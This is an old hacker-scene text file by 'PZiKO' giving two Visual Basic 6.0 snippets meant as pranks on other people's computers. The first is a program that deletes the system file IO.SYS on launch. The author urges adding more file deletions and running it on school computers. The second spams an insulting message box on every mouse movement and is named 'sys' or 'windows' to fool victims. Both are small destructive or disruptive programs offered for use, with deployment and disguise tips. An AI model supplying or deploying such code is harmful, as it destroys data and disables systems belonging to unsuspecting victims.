+=Funny Shit To Do With VB 6.0=+
------------------------------------------------
A small text file by......: PZiKO
ICQ.......................: 122983115
Email.....................: pziko@techfreak.at

£-Excuse my crap English-£

---------------------------------------------------------|
1. Delete important files with a REAL simple VB-proggie! |
---------------------------------------------------------|
Open a new project (Standard EXE-file).
Double-click on the form to bring up the code-window. 
Type in:
Private Sub Form_Load()
Kill "C:/IO.SYS" 
End Sub

- Now. Save the project as a EXE-file (File > Save (file) as EXE...).
Now, when the user starts whis proggie the IO.SYS will be deleted permantly. 
Maybe he/she have more important file, well, it's just to add on more Kill-code.
A real newbie can do this. Best place to use this is at the school, just find some
important files and and write them down, go home and code this little proggie, 
save it on a floppy and bring to school. 

---------------------------------------------------------|
2. Irretating proggie                                    |
---------------------------------------------------------|
Start a standard-exe-file.
Add this to the form-code:
Private Sub Form_MouseMove(Button As Integer, Shift As Integer, X As Single, Y As Single)
MsgBox "Hey! Fuck off!"
End Sub

-Now, when the user move's the mouse this MsgBox will appear, and the truth is: You are always
moving the mouse. Save it as an exe (go to the options and make it allways execute with maximized
window, and name the project something like: "sys", "windows", so when the user gonna crtl+alt+ delete
the proggie the bastard will think its some important file.)


Haha, it was a shot little file. Well, i will come back with more tips for newbie's! 

BY: PZiKO
-KiLL C:/IO.SYS-